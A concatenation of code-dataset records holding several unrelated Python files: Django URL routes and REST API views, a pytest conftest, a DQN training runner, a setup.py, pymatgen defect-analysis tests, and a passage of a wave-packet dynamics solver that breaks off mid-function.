name='index'),\r\n\t\r\n\tpath(\r\n\t\t'funcionarios/',\r\n\t\tFuncionarioListView.as_view(),\r\n\t\tname='lista_funcionarios'),\r\n\r\n\tpath(\r\n\t\t'setores/',\r\n\t\tSetorListView.as_view(),\r\n\t\tname='lista_setores'),\r\n\r\n\tpath(\r\n\t\t'funcionario/',\r\n\t\tFuncionarioUpdateView.as_view(),\r\n\t\tname='atualiza_funcionario'),\r\n\r\n\tpath(\r\n\t\t'setor/',\r\n\t\tSetorUpdateView.as_view(),\r\n\t\tname='atualiza_setor'),\r\n\r\n\tpath(\r\n\t\t'funcionario/excluiF/',\r\n\t\tFuncionarioDeleteView.as_view(),\r\n\t\tname='deleta_funcionario'),\r\n\r\n\tpath(\r\n\t\t'setor/excluir/',\r\n\t\tSetorDeleteView.as_view(),\r\n\t\tname='deleta_setor'),\r\n\r\n\tpath(\r\n\t\t'funcionario/cadastrar/',\r\n\t\tFuncionarioCreateView.as_view(),\r\n\t\tname='cadastra_funcionario'),\r\n\r\n\tpath(\r\n\t\t'setor/cadastrar/',\r\n\t\tSetorCreateView.as_view(),\r\n\t\tname='cadastra_setor'),\r\n\r\n\r\n\r\n\r\n]","sub_path":"helloworld/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"482266746","text":"from sybil import Sybil\nfrom sybil.parsers.codeblock import CodeBlockParser\nfrom pandas.testing import assert_series_equal\nimport pytest\nimport pandas as pd\n\n\n@pytest.fixture(scope=\"session\")\ndef assert_rows_equal():\n def _assert_rows_equal(r1, r2):\n d1 = r1.asDict(recursive=True)\n s1 = pd.Series(d1, index = sorted(d1.keys()))\n d2 = r2.asDict(recursive=True)\n s2 = pd.Series(d2, index = sorted(d2.keys()))\n # Permissive to floating-point error\n assert_series_equal(s1, s2)\n return _assert_rows_equal\n\npytest_collect_file = Sybil(\n parsers=[\n CodeBlockParser(future_imports=['print_function']),\n ],\n pattern='*.rst',\n fixtures=['assert_rows_equal', 'spark'],\n).pytest()\n","sub_path":"docs/source/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"494757914","text":"from environment import Environment\nfrom agent import *\n\n# Config Parameters\nepisode = 10**10\nframes = 10**1000\nheight = 7\nwidth = 7\nframe_rate = 0.01\nagent = 'NN' # random / NN\nlayers = 3\nepsilon = 0.5\ngamma = 1\nlearning_rate = 0.05\nmini_batch_size = 100\nexperience_pool_size = 500\neval_net_threshold = 50\ntarget_net_threshold = 10\nmodel_saving_threshold = 200\nobserve_rl_threshold = 100\nenter_test_mode_threshold = 100\nrevert_to_train_threshold = 20\nis_enable_ddqn = False\n\n\nif __name__ == \"__main__\":\n # Set the environment\n env = Environment(height=height, width=width, frame_rate=frame_rate)\n\n # Determine which agent to use\n if agent == 'random':\n agent = RandomAgent(experience_pool_size=experience_pool_size, shape=(height, width, layers))\n\n elif agent == 'NN':\n agent = NNAgent(shape=(height, width, layers)\n , epsilon=epsilon\n , gamma=gamma\n , learning_rate=learning_rate\n , 
mini_batch_size=mini_batch_size\n , experience_pool_size=experience_pool_size\n , eval_net_threshold=eval_net_threshold\n , target_net_threshold=target_net_threshold\n , is_enable_ddqn=is_enable_ddqn\n , model_saving_threshold=model_saving_threshold\n )\n\n else:\n print('No such agent!!!')\n exit()\n\n\n # set train_counter and test_counter\n train_counter = 0\n test_counter = 0\n\n # Start training\n for game in range(episode):\n print('episode:', game+1)\n state = env.reset()\n\n if not agent.is_test_mode:\n train_counter += 1\n else:\n test_counter += 1\n\n if train_counter == enter_test_mode_threshold:\n agent.is_test_mode = True\n train_counter = 0\n\n if test_counter == revert_to_train_threshold:\n agent.is_test_mode = False\n test_counter = 0\n\n for frame in range(frames):\n # determine state, action and reward\n action = agent.get_action(state)\n next_state, reward, done, info = env.step(action)\n agent.collect_experience(state, action, reward, next_state, done)\n state = next_state\n\n # execute specific method for the agent\n agent.agent_specific_method(game)\n\n if info is not None:\n print(info)\n print('is test mode:', agent.is_test_mode)\n print('# of times eval_net was updated:', agent.eval_net_update_count)\n print('# of times target_net was updated:', agent.target_net_update_count)\n\n if done:\n break\n\n","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"100462587","text":"import os\nfrom setuptools import setup, find_packages\nAPP = 'pgin'\nhere = os.path.abspath(os.path.dirname(__file__))\n# ==========================\n\n\ndef read_version():\n with open(os.path.join(here, APP, 'VERSION')) as vfr:\n version = vfr.read().strip()\n return version\n# ______________________________\n\n\nsetup(\n name=APP,\n version=read_version(),\n author=\"Victor Ziv\",\n author_email=\"vziv@infinidat.com\",\n url='https://git.infinidat.com/ivt/%s.git' % APP,\n packages=find_packages(),\n license='Proprietary',\n description='Very dedicated PostgreSQL DB migration utility. 
Using Python 3.6+ and psycopg2',\n long_description=open('README.rst').read(),\n long_description_content_type=\"text/x-rst\",\n install_requires=[\n 'jinja2',\n 'psycopg2',\n 'click',\n 'jsonlines',\n 'colorama',\n 'tabulate',\n 'toml',\n 'flake8'\n ],\n include_package_data=True,\n python_requires='>=3.6',\n\n entry_points='''\n [console_scripts]\n pgin=pgin.scripts.pgin:cli\n ''',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"434621686","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import EducationSerializer, ExperienceSerializer,ProjectSerializer,ProfileSerializer, SkillSerializer,CourseSerializer\n\nfrom .models import Education,Project, Experience, Skill, Course,Profile\n# Create your views here.\n\n@api_view(['GET'])\ndef apiOverview(request):\n\tapi_urls = {\n\t\t'List':'/education-list/',\n\t\t'Detail View':'/education-detail//',\n\t\t'Create':'/education-create/',\n\t\t'Update':'/education-update//',\n\t\t'Delete':'/education-delete//',\n\t\t}\n\n\treturn Response(api_urls)\n\n\t#\t\t**********\t\tEducation\t\t**********\n\n\n@api_view(['GET'])\ndef educationList(request):\n\teducations = Education.objects.all().order_by('-id')\n\tserializer = EducationSerializer(educations, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef educationCreate(request):\n\tserializer = EducationSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef educationUpdate(request, pk):\n\teducation = Education.objects.get(id=pk)\n\tserializer = EducationSerializer(instance=education, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n\n\t#\t\t**********\t\tprofile\t\t**********\n\n\n@api_view(['POST'])\ndef profileCreate(request):\n\tserializer = ProfileSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\n\treturn Response(serializer.data)\n\n@api_view(['GET'])\ndef profileDetail(request):\n\tprofile = Profile.objects.first()\n\tserializer = ProfileSerializer(profile, many=False)\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef profileUpdate(request, pk):\n\tprofile = Profile.objects.get(id=pk)\n\tserializer = ProfileSerializer(instance=profile, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n\t#\t\t**********\t\tExperience\t\t**********\n\n\n@api_view(['GET'])\ndef experienceList(request):\n\teducations = Experience.objects.all().order_by('-id')\n\tserializer = ExperienceSerializer(educations, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef experienceCreate(request):\n\tserializer =ExperienceSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef experienceUpdate(request, pk):\n\texperience = Experience.objects.get(id=pk)\n\tserializer = ExperienceSerializer(instance=experience, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n\t#\t\t**********\t\tSkill\t\t**********\n\n\n@api_view(['GET'])\ndef skillList(request):\n\tskills = 
Skill.objects.all().order_by('-id')\n\tserializer = SkillSerializer(skills, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef skillCreate(request):\n\tserializer = SkillSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef skillUpdate(request, pk):\n\tskill = Skill.objects.get(id=pk)\n\tserializer = SkillSerializer(instance=skill, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n\n\t#\t\t**********\t\tProject\t\t**********\n\n\n\n@api_view(['GET'])\ndef projectList(request):\n\tprojects = Project.objects.all().order_by('-id')\n\tserializer = ProjectSerializer(projects, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef projectCreate(request):\n\tserializer = ProjectSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef projectUpdate(request, pk):\n\tproject = Project.objects.get(id=pk)\n\tserializer = ProjectSerializer(instance=project, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n#\n\n\n@api_view(['GET'])\ndef courseList(request):\n\tcourses = Course.objects.all().order_by('-id')\n\tserializer = CourseSerializer(courses, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef courseCreate(request):\n\tserializer = CourseSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef courseUpdate(request, pk):\n\tcourse = Course.objects.get(id=pk)\n\tserializer = CourseSerializer(instance=course, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"446369941","text":"import random\n\nif __name__ == '__main__':\n list1 = [random.randint(-15, 14) for _ in range(20)]\n max_num = max(list1)\n counter = 0\n for i in list1:\n if abs(i) > max_num:\n counter += 1\n print(list1)\n print(max_num)\n print(counter)\n","sub_path":"tasks/beginer/16_abs.py","file_name":"16_abs.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"446290856","text":"n,m =map(int,input().split())\r\n\r\na = [int(x)//2 for x in input().split()]\r\n\r\nimport fractions\r\n\r\ndef lcm(x, y):\r\n return (x * y) // fractions.gcd(x, y)\r\n\r\nimport math\r\n\r\nlcm1 = 1\r\nfor i in a:\r\n lcm1 = lcm(lcm1, i)\r\n if((lcm1//i)%2==0):\r\n print(0)\r\n exit()\r\n\r\nprint(math.ceil((m//lcm1)/2))\t\t\t\r\n","sub_path":"abc150/abc150_d/20200111131454.py","file_name":"20200111131454.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"498628631","text":"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\n\nimport unittest\nimport os\nimport numpy as np\nimport random\n\nfrom pymatgen.analysis.defects.utils import QModel, eV_to_k, \\\n generate_reciprocal_vectors_squared, \\\n closestsites, StructureMotifInterstitial, TopographyAnalyzer, \\\n ChargeDensityAnalyzer, converge, 
calculate_vol\nfrom pymatgen.util.testing import PymatgenTest\n\nfrom pymatgen.core import PeriodicSite\nfrom pymatgen.core.structure import Structure\nfrom pymatgen.core.lattice import Lattice\n\nfrom pymatgen.io.vasp.outputs import Chgcar\n\ntry:\n from skimage.feature import peak_local_max\nexcept ImportError:\n peak_local_max = None\n\ntest_dir = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"..\", \"..\",\n 'test_files', \"chgden\")\n\n\nclass DefectsUtilsTest(PymatgenTest):\n def test_qmodel(self):\n qm = QModel()\n modqm = QModel(beta=2., expnorm=0.5, gamma=0.1)\n\n # test rho_rec\n self.assertEqual(qm.rho_rec(1.), 0.77880078307140488)\n self.assertEqual(modqm.rho_rec(1.), 0.6814583156907158)\n\n # test rho_rec_limit0\n self.assertEqual(qm.rho_rec_limit0, -0.25)\n self.assertEqual(modqm.rho_rec_limit0, -0.51)\n\n def test_eV_to_k(self):\n self.assertAlmostEqual(eV_to_k(1.), 0.9681404248678961)\n\n def test_genrecip(self):\n # TODO\n pass\n\n def test_generate_reciprocal_vectors_squared(self):\n # test cubic case\n a = 6.\n lattvectors = [[a if i == j else 0. for j in range(3)] for i in\n range(3)]\n brecip = [1.0966227112321507 for i in range(6)]\n self.assertAlmostEqual(\n list(generate_reciprocal_vectors_squared(lattvectors[0],\n lattvectors[1],\n lattvectors[2], 1.3)),\n brecip)\n\n # test orthorhombic case\n lattconsts = [a, a / 2., 3. * a]\n lattvectors = [[lattconsts[i] if i == j else 0. for j in range(3)] for i\n in range(3)]\n brval = 0.4873878716587337\n brecip = [brval, brval / 4., brval / 4., brval]\n self.assertAlmostEqual(\n list(generate_reciprocal_vectors_squared(lattvectors[0],\n lattvectors[1],\n lattvectors[2], 1.)),\n brecip)\n\n # test triclinic case\n lattvectors = [[1.5, 0.2, 0.3], [0.3, 1.2, .2], [0.5, 0.4, 1.3]]\n brval = 24.28330561545568\n brecip = [brval, brval]\n self.assertAlmostEqual(\n list(generate_reciprocal_vectors_squared(lattvectors[0],\n lattvectors[1],\n lattvectors[2], 30.)),\n brecip)\n\n def test_closest_sites(self):\n struct = PymatgenTest.get_structure(\"VO2\")\n\n # test O vacancy\n dstruct = struct.copy()\n dstruct.remove_sites([0])\n pos = struct.sites[0].coords\n bsite, dsite = closestsites(struct, dstruct, pos)\n self.assertEqual(bsite[2], 0) # test against index\n self.assertEqual(dsite[2], 4)\n\n # test V vacancy\n dstruct = struct.copy()\n dstruct.remove_sites([4])\n pos = struct.sites[4].coords\n bsite, dsite = closestsites(struct, dstruct, pos)\n self.assertEqual(bsite[2], 4) # test against index\n self.assertEqual(dsite[2], 1)\n\n def test_converges(self):\n self.assertAlmostEqual(converge(np.sqrt, 0.1, 0.1, 1.0),\n 0.6324555320336759)\n\n\nclass StructureMotifInterstitialTest(PymatgenTest):\n def setUp(self):\n self.silicon = Structure(\n Lattice.from_lengths_and_angles([5.47, 5.47, 5.47],\n [90.0, 90.0, 90.0]),\n [\"Si\", \"Si\", \"Si\", \"Si\", \"Si\", \"Si\", \"Si\", \"Si\"],\n [[0.000000, 0.000000, 0.500000], [0.750000, 0.750000, 0.750000],\n [0.000000, 0.500000, 1.000000],\n [0.750000, 0.250000, 0.250000], [0.500000, 0.000000, 1.000000],\n [0.250000, 0.750000, 0.250000],\n [0.500000, 0.500000, 0.500000], [0.250000, 0.250000, 0.750000]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=False,\n site_properties=None)\n self.smi = StructureMotifInterstitial(\n self.silicon,\n \"Si\",\n motif_types=[\"tetrahedral\", \"octahedral\"],\n op_threshs=[0.3, 0.5],\n dl=0.4,\n doverlap=1.0,\n facmaxdl=1.51)\n self.diamond = Structure(\n Lattice([[2.189, 0, 1.264], [0.73, 2.064, 1.264], [0, 0, 
2.528]]),\n [\"C0+\", \"C0+\"],\n [[2.554, 1.806, 4.423], [0.365, 0.258, 0.632]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n self.nacl = Structure(\n Lattice([[3.485, 0, 2.012], [1.162, 3.286, 2.012], [0, 0, 4.025]]),\n [\"Na1+\", \"Cl1-\"],\n [[0, 0, 0], [2.324, 1.643, 4.025]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n self.cscl = Structure(\n Lattice([[4.209, 0, 0], [0, 4.209, 0], [0, 0, 4.209]]),\n [\"Cl1-\", \"Cs1+\"],\n [[2.105, 2.105, 2.105], [0, 0, 0]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n self.square_pyramid = Structure(\n Lattice([[100, 0, 0], [0, 100, 0], [0, 0, 100]]),\n [\"C\", \"C\", \"C\", \"C\", \"C\", \"C\"],\n [[0, 0, 0], [1, 0, 0], [-1, 0, 0], [0, 1, 0], [0, -1, 0],\n [0, 0, 1]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n self.trigonal_bipyramid = Structure(\n Lattice([[100, 0, 0], [0, 100, 0], [0, 0, 100]]),\n [\"P\", \"Cl\", \"Cl\", \"Cl\", \"Cl\", \"Cl\"],\n [[0, 0, 0], [0, 0, 2.14], [0, 2.02, 0], [1.74937, -1.01, 0],\n [-1.74937, -1.01, 0], [0, 0, -2.14]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n\n def test_all(self):\n self.assertIsInstance(self.smi, StructureMotifInterstitial)\n self.assertEqual(len(self.smi.enumerate_defectsites()), 1)\n self.assertIsInstance(self.smi.enumerate_defectsites()[0], PeriodicSite)\n self.assertEqual(\"Si\",\n self.smi.enumerate_defectsites()[0].species_string)\n self.assertEqual(\"tetrahedral\", self.smi.get_motif_type(0))\n\n elem_cn_dict = self.smi.get_coordinating_elements_cns(0)\n self.assertEqual(len(list(elem_cn_dict.keys())), 1)\n self.assertEqual(list(elem_cn_dict.keys())[0], \"Si\")\n self.assertEqual(elem_cn_dict[\"Si\"], 4)\n\n structs = self.smi.make_supercells_with_defects(np.array([1, 1, 1]))\n self.assertEqual(len(structs), 2)\n self.assertIsInstance(structs[0], Structure)\n\n def tearDown(self):\n del self.smi\n del self.silicon\n del self.diamond\n del self.nacl\n del self.cscl\n\n\nclass TopographyAnalyzerTest(unittest.TestCase):\n def setUp(self):\n feo4 = Structure.from_file(os.path.join(test_dir, \"LiFePO4.cif\"))\n feo4.remove_species([\"Li\"])\n feo4.remove_oxidation_states()\n self.feo4 = feo4\n\n def test_topography_analyzer(self):\n # check interstitial sites for FePO4 using Voronoi Tessellation\n vor_feo4 = TopographyAnalyzer(self.feo4, framework_ions=[\"O\"],\n cations=[\"P\", \"Fe\"], check_volume=False)\n vor_feo4.cluster_nodes(tol=1.2)\n vor_feo4.remove_collisions(1.2)\n s_feo4 = vor_feo4.get_structure_with_nodes()\n sites_feo4 = np.array(\n [s_feo4[i].frac_coords for i in range(len(s_feo4)) if\n s_feo4[i].species_string == \"X0+\"])\n\n # check total number of vnodes\n self.assertAlmostEqual(len(vor_feo4.vnodes), 24)\n\n # check four sites that match Li sites in LiFePO4(mp-19017)\n site_predicted = [[0, 0, 0], [0.5, 0.5, 0.5], [0.5, 0, 0.5],\n [0, 0.5, 0]]\n for i in range(0, 4):\n is_site_matched = False\n for site in sites_feo4:\n distance = s_feo4.lattice. 
\\\n get_distance_and_image(site, site_predicted[i])\n if distance[0] < 0.01:\n is_site_matched = True\n else:\n continue\n self.assertTrue(is_site_matched)\n\n def test_calculate_vol(self):\n s = Structure.from_file(os.path.join(test_dir, \"LiFePO4.cif\"))\n a = TopographyAnalyzer(s, framework_ions=[\"O\"],\n cations=[\"P\", \"Fe\"], check_volume=False)\n coords = [s[i].coords for i in [20, 23, 25, 17, 24, 19]]\n vol = calculate_vol(coords=coords)\n vol_expected = 12.8884 # LiO6 volume calculated by VESTA\n self.assertAlmostEqual(vol, vol_expected, 4)\n\n\n@unittest.skipIf(not peak_local_max,\n \"skimage.feature.peak_local_max module not present.\")\nclass ChgDenAnalyzerTest(unittest.TestCase):\n def setUp(self):\n # This is a CHGCAR_sum file with reduced grid size\n chgcar_path = os.path.join(test_dir, \"CHGCAR.FePO4\")\n chg_FePO4 = Chgcar.from_file(chgcar_path)\n self.chgcar_path = chgcar_path\n self.chg_FePO4 = chg_FePO4\n self.ca_FePO4 = ChargeDensityAnalyzer(chg_FePO4)\n self.s_LiFePO4 = Structure.from_file(\n os.path.join(test_dir, \"LiFePO4.cif\"))\n\n def test_get_local_extrema(self):\n ca = ChargeDensityAnalyzer.from_file(self.chgcar_path)\n threshold_frac = random.random()\n threshold_abs_min = random.randrange(2, 14)\n threshold_abs_max = random.randrange(27e2, 28e4)\n\n # Minima test\n full_list_min = self.ca_FePO4.get_local_extrema(find_min=True,\n threshold_frac=1.0)\n frac_list_min_frac = self.ca_FePO4.get_local_extrema(find_min=True,\n threshold_frac=threshold_frac)\n frac_list_min_abs = self.ca_FePO4.get_local_extrema(find_min=True,\n threshold_abs=threshold_abs_min)\n\n self.assertAlmostEqual(len(full_list_min) * threshold_frac,\n len(frac_list_min_frac), delta=1)\n\n ca.get_local_extrema(find_min=True)\n df_expected = ca.extrema_df[\n ca.extrema_df[\"Charge Density\"] <= threshold_abs_min]\n self.assertEqual(len(frac_list_min_abs), len(df_expected))\n\n # Maxima test\n full_list_max = self.ca_FePO4.get_local_extrema(find_min=False,\n threshold_frac=1.0)\n frac_list_max = self.ca_FePO4.get_local_extrema(find_min=False,\n threshold_frac=threshold_frac)\n frac_list_max_abs = self.ca_FePO4.get_local_extrema(find_min=False,\n threshold_abs=threshold_abs_max)\n\n self.assertAlmostEqual(len(full_list_max) * threshold_frac,\n len(frac_list_max), delta=1)\n\n # Local maxima should finds all center of atoms\n self.assertEqual(len(self.ca_FePO4.structure), len(full_list_max))\n\n ca.get_local_extrema(find_min=False)\n df_expected = ca.extrema_df[\n ca.extrema_df[\"Charge Density\"] >= threshold_abs_max]\n self.assertEqual(len(frac_list_max_abs), len(df_expected))\n\n def test_remove_collisions(self):\n ca = ChargeDensityAnalyzer(self.chg_FePO4)\n ca.get_local_extrema(threshold_frac=0)\n ca.remove_collisions() # should not trigger error\n self.assertEqual(len(ca.extrema_df), 0)\n\n self.ca_FePO4.get_local_extrema(find_min=False, threshold_frac=1.0)\n self.ca_FePO4.remove_collisions(min_dist=0.5)\n self.assertEqual(len(self.ca_FePO4.extrema_df), 0)\n\n def test_cluster_nodes(self):\n ca = ChargeDensityAnalyzer(self.chg_FePO4)\n ca.get_local_extrema()\n ca.cluster_nodes(tol=20)\n self.assertEqual(len(ca.extrema_df), 1)\n\n def test_get_structure_with_nodes(self):\n s_FePO4 = self.ca_FePO4.get_structure_with_nodes(find_min=True)\n\n sites_predicted = np.array([\n self.s_LiFePO4[i].frac_coords\n for i in range(len(self.s_LiFePO4))\n if self.s_LiFePO4[i].species_string == \"Li\"\n ])\n sites_guess = np.array(\n [s_FePO4[i].frac_coords for i in range(len(s_FePO4)) if\n 
s_FePO4[i].species_string == \"X0+\"])\n distances = s_FePO4.lattice.get_all_distances(sites_predicted,\n sites_guess).flatten()\n distances = [d for d in distances if d < 0.1]\n self.assertEqual(len(distances), len(sites_predicted))\n\n def test_from_file(self):\n ca = ChargeDensityAnalyzer.from_file(self.chgcar_path)\n self.assertTrue(isinstance(ca, ChargeDensityAnalyzer))\n\n def test_sort_sites_by_integrated_chg(self):\n print(self.chgcar_path)\n ca = ChargeDensityAnalyzer.from_file(self.chgcar_path)\n ca.get_local_extrema()\n ca.sort_sites_by_integrated_chg()\n print(ca._extrema_df.iloc[0], 0.5)\n print(ca._extrema_df.iloc[0]['avg_charge_den'])\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['a'], 0.0)\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['b'], 0.5)\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['c'], 0.0)\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['Charge Density'],\n 1.65288944124)\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['avg_charge_den'],\n 0.006831484178753711)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pymatgen/analysis/defects/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":14418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"628476519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 4 23:44:15 2021\n\nWave packet dynamics solver for wavepacket dynamics with N vibrational modes\n(N = 1 ,2)\n\nFor linear coordinates, use SPO method\nFor curvilinear coordinates, use RK4 method\n\n@author: Bing Gu\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import cos, pi\nfrom numba import jit\nfrom scipy.fftpack import fft2, ifft2, fftfreq\nfrom numpy.linalg import inv, det\n\nfrom lime.phys import rk4\nfrom lime.units import au2fs\n\nclass Solver():\n def __init__(self):\n self.obs_ops = None\n self.grid = None\n\n def set_obs_ops(self, obs_ops):\n self.obs_ops = obs_ops\n return\n\nclass SPO_1d(Solver):\n def __init__(self):\n self.x = None\n self.v = None\n\n def set_grid(self, xmin=-1, xmax=1, npts=32):\n self.x = np.linspace(xmin, xmax, npts)\n\n def set_potential(self, potential):\n self.v = potential(self.x)\n return\n\n def evolve(self, psi0, dt, Nt=1):\n psi = psi0\n return psi\n\n\nclass SPO_2d():\n def __init__(self):\n self.x = None\n self.y = None\n\n def set_grid(self, x, y):\n self.x = x\n self.y = y\n\n def set_potential(self, v):\n return v\n\n def evolve(self, psi0, dt, Nt=1):\n psi = psi0\n return psi\n\nclass SPO_3d():\n def __init__(self):\n self.x = None\n self.y = None\n\n def set_grid(self, x, y):\n self.x = x\n self.y = y\n\n def set_potential(self, v):\n return v\n\n def evolve(self, psi0, dt, Nt=1):\n psi = psi0\n return psi\n\n\n@jit\ndef gauss_x_2d(sigma, x0, y0, kx0, ky0):\n \"\"\"\n generate the gaussian distribution in 2D grid\n :param x0: float, mean value of gaussian wavepacket along x\n :param y0: float, mean value of gaussian wavepacket along y\n :param sigma: float array, covariance matrix with 2X2 dimension\n :param kx0: float, initial momentum along x\n :param ky0: float, initial momentum along y\n :return: gauss_2d: float array, the gaussian distribution in 2D grid\n \"\"\"\n gauss_2d = np.zeros((len(x), len(y)), dtype=np.complex128)\n\n for i in range(len(x)):\n for j in range(len(y)):\n delta = np.dot(np.array([x[i]-x0, y[j]-y0]), inv(sigma))\\\n .dot(np.array([x[i]-x0, y[j]-y0]))\n gauss_2d[i, j] = (np.sqrt(det(sigma))\n * np.sqrt(np.pi) ** 2) ** 
(-0.5) \\\n * np.exp(-0.5 * delta + 1j\n * np.dot(np.array([x[i], y[j]]),\n np.array([kx0, ky0])))\n\n return gauss_2d\n\n\n@jit\ndef potential_2d(x_range_half, y_range_half, couple_strength, couple_type):\n \"\"\"\n generate two symmetric harmonic potentials wrt the origin point in 2D\n :param x_range_half: float, the displacement of potential from the origin\n in x\n :param y_range_half: float, the displacement of potential from the origin\n in y\n :param couple_strength: the coupling strength between these two potentials\n :param couple_type: int, the nonadiabatic coupling type. here, we used:\n 0) no coupling\n 1) constant coupling\n 2) linear coupling\n :return: v_2d: float list, a list containing for matrices:\n v_2d[0]: the first potential matrix\n v_2d[1]: the potential coupling matrix\n between the first and second\n v_2d[2]: the potential coupling matrix\n between the second and first\n v_2d[3]: the second potential matrix\n \"\"\"\n v_2d = [0, 0, 0, 0]\n v_2d[0] = (xv + x_range_half) ** 2 / 2.0 + (yv + y_range_half) ** 2 / 2.0\n v_2d[3] = (xv - x_range_half) ** 2 / 2.0 + (yv - y_range_half) ** 2 / 2.0\n\n # x_cross = sympy.Symbol('x_cross')\n # mu = sympy.solvers.solve(\n # (x_cross - x_range_half) ** 2 / 2.0 -\n # (x_cross + x_range_half) ** 2 / 2.0,\n # x_cross)\n\n if couple_type == 0:\n v_2d[1] = np.zeros(np.shape(v_2d[0]))\n v_2d[2] = np.zeros(np.shape(v_2d[0]))\n elif couple_type == 1:\n v_2d[1] = np.full((np.shape(v_2d[0])), couple_strength)\n v_2d[2] = np.full((np.shape(v_2d[0])), couple_strength)\n elif couple_type == 2:\n v_2d[1] = couple_strength * (xv+yv)\n v_2d[2] = couple_strength * (xv+yv)\n # elif couple_type == 3:\n # v_2d[1] = couple_strength \\\n # * np.exp(-(x - float(mu[0])) ** 2 / 2 / sigma ** 2)\n # v_2d[2] = couple_strength \\\n # * np.exp(-(x - float(mu[0])) ** 2 / 2 / sigma ** 2)\n else:\n raise 'error: coupling type not existing'\n\n return v_2d\n\n\n@jit\ndef diabatic(x, y):\n \"\"\"\n PESs in diabatic representation\n :param x_range_half: float, the displacement of potential from the origin\n in x\n :param y_range_half: float, the displacement of potential from the origin\n in y\n :param couple_strength: the coupling strength between these two potentials\n :param couple_type: int, the nonadiabatic coupling type. here, we used:\n 0) no coupling\n 1) constant coupling\n 2) linear coupling\n :return:\n v: float 2d array, matrix elements of the DPES and couplings\n \"\"\"\n nstates = 2\n\n v = np.zeros((nstates, nstates))\n\n v[0,0] = (x + 4.) ** 2 / 2.0 + (y + 3.) ** 2 / 2.0\n v[1,1] = (x - 4.) ** 2 / 2.0 + (y - 3.) 
